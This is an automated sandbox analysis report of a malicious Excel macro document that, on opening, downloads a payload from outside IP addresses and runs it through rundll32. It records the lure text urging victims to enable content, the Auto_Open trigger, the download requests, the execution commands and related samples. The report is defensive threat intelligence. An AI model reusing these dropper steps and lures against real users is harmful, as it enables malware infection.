Loading ...

Play interactive tourEdit tour

Analysis Report Comission_1980420924_03172021.xlsm

Overview

General Information

Sample Name:Comission_1980420924_03172021.xlsm
Analysis ID:383366
MD5:7c87c28b3c650992cca31f7728aa2cfd
SHA1:e278ae31532f3f65297d8c97d21080321cd79e9f
SHA256:c794d4aa56fd9e070e2a7ef2b18c08016da687eddb100350216cada8110074d9
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Found abnormal large hidden Excel 4.0 Macro sheet
Outdated Microsoft Office dropper detected
Excel documents contains an embedded macro which executes code when the document is opened
IP address seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Uses a known web browser user agent for HTTP communication

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 972 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • rundll32.exe (PID: 2760 cmdline: Rundll32 ..\Kiod.hod,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
    • rundll32.exe (PID: 2808 cmdline: Rundll32 ..\Kiod.hod1,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
    • rundll32.exe (PID: 2468 cmdline: Rundll32 ..\Kiod.hod2,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Software Vulnerabilities:

barindex
Document exploit detected (UrlDownloadToFile)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe
Source: global trafficDNS query: name: 44293.7276049768.dat
Source: global trafficTCP traffic: 192.168.2.22:49169 -> 188.119.112.114:80
Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.127.230.104:80

Networking:

barindex
Outdated Microsoft Office dropper detectedShow sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDNS query: 44293.7276049768.dat is down
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDNS query: 44293.7276049768.dat is down
Source: Joe Sandbox ViewIP Address: 188.119.112.114 188.119.112.114
Source: Joe Sandbox ViewIP Address: 188.127.230.104 188.127.230.104
Source: unknownDNS traffic detected: query: 44293.7276049768.dat replaycode: Name error (3)
Source: global trafficHTTP traffic detected: GET /44293.7276049768.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 188.119.112.114Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /44293.7276049768.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 185.82.219.75Connection: Keep-Alive
Source: unknownTCP traffic detected without corresponding DNS query: 188.127.230.104
Source: unknownTCP traffic detected without corresponding DNS query: 188.127.230.104
Source: unknownTCP traffic detected without corresponding DNS query: 188.127.230.104
Source: unknownTCP traffic detected without corresponding DNS query: 188.127.230.104
Source: unknownTCP traffic detected without corresponding DNS query: 188.127.230.104
Source: unknownTCP traffic detected without corresponding DNS query: 188.127.230.104
Source: unknownTCP traffic detected without corresponding DNS query: 188.119.112.114
Source: unknownTCP traffic detected without corresponding DNS query: 188.119.112.114
Source: unknownTCP traffic detected without corresponding DNS query: 188.119.112.114
Source: unknownTCP traffic detected without corresponding DNS query: 188.119.112.114
Source: unknownTCP traffic detected without corresponding DNS query: 185.82.219.75
Source: unknownTCP traffic detected without corresponding DNS query: 185.82.219.75
Source: unknownTCP traffic detected without corresponding DNS query: 185.82.219.75
Source: unknownTCP traffic detected without corresponding DNS query: 185.82.219.75
Source: unknownTCP traffic detected without corresponding DNS query: 188.119.112.114
Source: unknownTCP traffic detected without corresponding DNS query: 185.82.219.75
Source: unknownTCP traffic detected without corresponding DNS query: 185.82.219.75
Source: unknownTCP traffic detected without corresponding DNS query: 188.119.112.114
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A4B9C4AC.jpegJump to behavior
Source: global trafficHTTP traffic detected: GET /44293.7276049768.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 188.119.112.114Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /44293.7276049768.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 185.82.219.75Connection: Keep-Alive
Source: rundll32.exe, 00000004.00000002.2205313845.0000000001CB0000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2202746600.0000000001BC0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2196756284.0000000001C80000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknownDNS traffic detected: queries for: 44293.7276049768.dat
Source: rundll32.exe, 00000004.00000002.2205313845.0000000001CB0000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2202746600.0000000001BC0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2196756284.0000000001C80000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000004.00000002.2205313845.0000000001CB0000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2202746600.0000000001BC0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2196756284.0000000001C80000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
Source: rundll32.exe, 00000004.00000002.2205780989.0000000001E97000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2203001284.0000000001DA7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2196966201.0000000001E67000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000004.00000002.2205780989.0000000001E97000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2203001284.0000000001DA7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2196966201.0000000001E67000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: rundll32.exe, 00000004.00000002.2205780989.0000000001E97000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2203001284.0000000001DA7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2196966201.0000000001E67000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: rundll32.exe, 00000004.00000002.2205780989.0000000001E97000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2203001284.0000000001DA7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2196966201.0000000001E67000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: rundll32.exe, 00000004.00000002.2205313845.0000000001CB0000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2202746600.0000000001BC0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2196756284.0000000001C80000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000004.00000002.2205780989.0000000001E97000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2203001284.0000000001DA7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2196966201.0000000001E67000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
Source: rundll32.exe, 00000004.00000002.2205313845.0000000001CB0000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2202746600.0000000001BC0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2196756284.0000000001C80000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: rundll32.exe, 00000006.00000002.2196756284.0000000001C80000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
Source: Screenshot number: 4Screenshot OCR: Enable editing button from the yellow bar above Onoe you have enabled editing. please click Enabl
Source: Screenshot number: 4Screenshot OCR: Enable Content bytton from the yellow bar above R jnMl Rr ;r'j i m m RunDLL |~| ,0 There was a
Source: Screenshot number: 8Screenshot OCR: Enable editing button from the yellow bar above 12 " Onoe you have enabled editing. please click En
Source: Screenshot number: 8Screenshot OCR: Enable Content bytton from the yellow bar above 13 14 15 16 17 18 19 20 21 22 23 24 25
Source: Document image extraction number: 1Screenshot OCR: Enable editing button from the yellow bar above Once you have enabled edding, please click Enable
Source: Document image extraction number: 1Screenshot OCR: Enable Content bytton from the yellow bar above
Source: Screenshot number: 12Screenshot OCR: Enable editing button from the yellow bar above 12 " Onoe you have enabled editing. please click En
Source: Screenshot number: 12Screenshot OCR: Enable Content bytton from the yellow bar above 13 14 15 16 17 18 19 20 21 22 23 24 25
Found Excel 4.0 Macro with suspicious formulasShow sources
Source: Comission_1980420924_03172021.xlsmInitial sample: EXEC
Found abnormal large hidden Excel 4.0 Macro sheetShow sources
Source: Comission_1980420924_03172021.xlsmInitial sample: Sheet size: 19220
Source: workbook.xmlBinary string: <workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x15 xr xr6 xr10 xr2" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xmlns:xr10="http://schemas.microsoft.com/office/spreadsheetml/2016/revision10" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2"><fileVersion appName="xl" lastEdited="7" lowestEdited="7" rupBuild="22730"/><workbookPr/><mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006"><mc:Choice Requires="x15"><x15ac:absPath url="E:\Nowiy\" xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac"/></mc:Choice></mc:AlternateContent><xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{E74EC3A0-E6C1-4379-B2DF-09ED883A9632}" xr6:coauthVersionLast="45" xr6:coauthVersionMax="45" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/><bookViews><workbookView xWindow="-108" yWindow="-108" windowWidth="20376" windowHeight="12360" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/></bookViews><sheets><sheet name="sheet" sheetId="1" r:id="rId1"/><sheet name="sheet1" sheetId="2" r:id="rId2"/><sheet name="sheet2" sheetId="8" r:id="rId3"/></sheets><definedNames><definedName name="_xlnm.Auto_Open">sheet1!$AO$168</definedName></definedNames><calcPr calcId="162913"/></workbook>
Source: rundll32.exe, 00000004.00000002.2205313845.0000000001CB0000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2202746600.0000000001BC0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2196756284.0000000001C80000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
Source: classification engineClassification label: mal68.troj.expl.evad.winXLSM@7/7@2/3
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$Comission_1980420924_03172021.xlsmJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRDD05.tmpJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe Rundll32 ..\Kiod.hod,DllRegisterServer
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe Rundll32 ..\Kiod.hod,DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe Rundll32 ..\Kiod.hod1,DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe Rundll32 ..\Kiod.hod2,DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe Rundll32 ..\Kiod.hod,DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe Rundll32 ..\Kiod.hod1,DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe Rundll32 ..\Kiod.hod2,DllRegisterServer
Source: C:\Windows\System32\rundll32.exeAutomated click: OK
Source: C:\Windows\System32\rundll32.exeAutomated click: OK
Source: C:\Windows\System32\rundll32.exeAutomated click: OK
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: Comission_1980420924_03172021.xlsmInitial sample: OLE zip file path = xl/drawings/drawing2.xml
Source: Comission_1980420924_03172021.xlsmInitial sample: OLE zip file path = xl/drawings/drawing3.xml
Source: Comission_1980420924_03172021.xlsmInitial sample: OLE zip file path = xl/drawings/_rels/drawing2.xml.rels
Source: Comission_1980420924_03172021.xlsmInitial sample: OLE zip file path = xl/drawings/_rels/drawing3.xml.rels
Source: Comission_1980420924_03172021.xlsmInitial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScripting21Path InterceptionProcess Injection1Masquerading1OS Credential DumpingFile and Directory Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumNon-Application Layer Protocol2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsExploitation for Client Execution23Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemorySystem Information Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothApplication Layer Protocol12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Rundll321Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationIngress Tool Transfer2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection1NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting21LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://188.119.112.114/44293.7276049768.dat0%Avira URL Cloudsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://185.82.219.75/44293.7276049768.dat0%Avira URL Cloudsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
44293.7276049768.dat
unknown
unknowntrue
    unknown

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    http://188.119.112.114/44293.7276049768.datfalse
    • Avira URL Cloud: safe
    unknown
    http://185.82.219.75/44293.7276049768.datfalse
    • Avira URL Cloud: safe
    unknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkrundll32.exe, 00000004.00000002.2205780989.0000000001E97000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2203001284.0000000001DA7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2196966201.0000000001E67000.00000002.00000001.sdmpfalse
      high
      http://www.windows.com/pctv.rundll32.exe, 00000006.00000002.2196756284.0000000001C80000.00000002.00000001.sdmpfalse
        high
        http://investor.msn.comrundll32.exe, 00000004.00000002.2205313845.0000000001CB0000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2202746600.0000000001BC0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2196756284.0000000001C80000.00000002.00000001.sdmpfalse
          high
          http://www.msnbc.com/news/ticker.txtrundll32.exe, 00000004.00000002.2205313845.0000000001CB0000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2202746600.0000000001BC0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2196756284.0000000001C80000.00000002.00000001.sdmpfalse
            high
            http://www.icra.org/vocabulary/.rundll32.exe, 00000004.00000002.2205780989.0000000001E97000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2203001284.0000000001DA7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2196966201.0000000001E67000.00000002.00000001.sdmpfalse
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            unknown
            http://windowsmedia.com/redir/services.asp?WMPFriendly=truerundll32.exe, 00000004.00000002.2205780989.0000000001E97000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2203001284.0000000001DA7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2196966201.0000000001E67000.00000002.00000001.sdmpfalse
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            unknown
            http://www.hotmail.com/oerundll32.exe, 00000004.00000002.2205313845.0000000001CB0000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2202746600.0000000001BC0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2196756284.0000000001C80000.00000002.00000001.sdmpfalse
              high
              http://investor.msn.com/rundll32.exe, 00000004.00000002.2205313845.0000000001CB0000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2202746600.0000000001BC0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2196756284.0000000001C80000.00000002.00000001.sdmpfalse
                high

                Contacted IPs

                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs

                Public

                IPDomainCountryFlagASNASN NameMalicious
                188.119.112.114
                unknownRussian Federation
                50673SERVERIUS-ASNLfalse
                188.127.230.104
                unknownRussian Federation
                56694DHUBRUfalse
                185.82.219.75
                unknownBulgaria
                59729ITL-BGfalse

                General Information

                Joe Sandbox Version:31.0.0 Emerald
                Analysis ID:383366
                Start date:07.04.2021
                Start time:17:26:50
                Joe Sandbox Product:CloudBasic
                Overall analysis duration:0h 6m 37s
                Hypervisor based Inspection enabled:false
                Report type:light
                Sample file name:Comission_1980420924_03172021.xlsm
                Cookbook file name:defaultwindowsofficecookbook.jbs
                Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                Number of analysed new started processes analysed:9
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • HDC enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Detection:MAL
                Classification:mal68.troj.expl.evad.winXLSM@7/7@2/3
                EGA Information:Failed
                HDC Information:Failed
                HCA Information:
                • Successful, ratio: 100%
                • Number of executed functions: 0
                • Number of non-executed functions: 0
                Cookbook Comments:
                • Adjust boot time
                • Enable AMSI
                • Found application associated with file extension: .xlsm
                • Found Word or Excel or PowerPoint or XPS Viewer
                • Found warning dialog
                • Click Ok
                • Attach to Office via COM
                • Scroll down
                • Close Viewer
                Warnings:
                Show All
                • Exclude process from analysis (whitelisted): dllhost.exe, WmiPrvSE.exe, svchost.exe

                Simulations

                Behavior and APIs

                No simulations

                Joe Sandbox View / Context

                IPs

                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                188.119.112.114Comission_1109505708_03172021.xlsmGet hashmaliciousBrowse
                • 188.119.112.114/44277.8302662037.dat
                Comission_1109505708_03172021.xlsmGet hashmaliciousBrowse
                • 188.119.112.114/44277.8255408565.dat
                $RJJLOFR.xlsmGet hashmaliciousBrowse
                • 188.119.112.114/44277.6243106481.dat
                $RJJLOFR.xlsmGet hashmaliciousBrowse
                • 188.119.112.114/44277.6192599537.dat
                Comission_1510175966_03172021.xlsmGet hashmaliciousBrowse
                • 188.119.112.114/44273.6999931713.dat
                Comission_1510175966_03172021.xlsmGet hashmaliciousBrowse
                • 188.119.112.114/44273.6949118056.dat
                Comission_1851374485_03172021.xlsmGet hashmaliciousBrowse
                • 188.119.112.114/44273.5870003472.dat
                Comission_1851374485_03172021.xlsmGet hashmaliciousBrowse
                • 188.119.112.114/44273.5824083333.dat
                Comission_1137322368_03172021.xlsmGet hashmaliciousBrowse
                • 188.119.112.114/44272.8791306713.dat
                Comission_1137322368_03172021.xlsmGet hashmaliciousBrowse
                • 188.119.112.114/44272.8720229167.dat
                Comission_917519487_03172021.xlsmGet hashmaliciousBrowse
                • 188.119.112.114/44272.7099361111.dat
                Comission_917519487_03172021.xlsmGet hashmaliciousBrowse
                • 188.119.112.114/44272.7046824074.dat
                188.127.230.104Comission_1109505708_03172021.xlsmGet hashmaliciousBrowse
                • 188.127.230.104/44277.8302662037.dat
                Comission_1109505708_03172021.xlsmGet hashmaliciousBrowse
                • 188.127.230.104/44277.8255408565.dat
                $RJJLOFR.xlsmGet hashmaliciousBrowse
                • 188.127.230.104/44277.6243106481.dat
                $RJJLOFR.xlsmGet hashmaliciousBrowse
                • 188.127.230.104/44277.6192599537.dat
                Comission_1510175966_03172021.xlsmGet hashmaliciousBrowse
                • 188.127.230.104/44273.6999931713.dat
                Comission_1510175966_03172021.xlsmGet hashmaliciousBrowse
                • 188.127.230.104/44273.6949118056.dat
                Comission_1851374485_03172021.xlsmGet hashmaliciousBrowse
                • 188.127.230.104/44273.5870003472.dat
                Comission_1851374485_03172021.xlsmGet hashmaliciousBrowse
                • 188.127.230.104/44273.5824083333.dat
                Comission_1137322368_03172021.xlsmGet hashmaliciousBrowse
                • 188.127.230.104/44272.8791306713.dat
                Comission_1137322368_03172021.xlsmGet hashmaliciousBrowse
                • 188.127.230.104/44272.8720229167.dat
                Comission_917519487_03172021.xlsmGet hashmaliciousBrowse
                • 188.127.230.104/44272.7099361111.dat
                Comission_917519487_03172021.xlsmGet hashmaliciousBrowse
                • 188.127.230.104/44272.7046824074.dat

                Domains

                No context

                ASN

                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                SERVERIUS-ASNLRFQ610016934.exeGet hashmaliciousBrowse
                • 188.119.113.200
                Proforma Invoice for payment URGENTLY.exeGet hashmaliciousBrowse
                • 188.119.113.200
                yuVhCk9sE9.exeGet hashmaliciousBrowse
                • 193.38.55.77
                Ar25M0UwOR.exeGet hashmaliciousBrowse
                • 193.38.55.33
                yOrAsxt8Qv.exeGet hashmaliciousBrowse
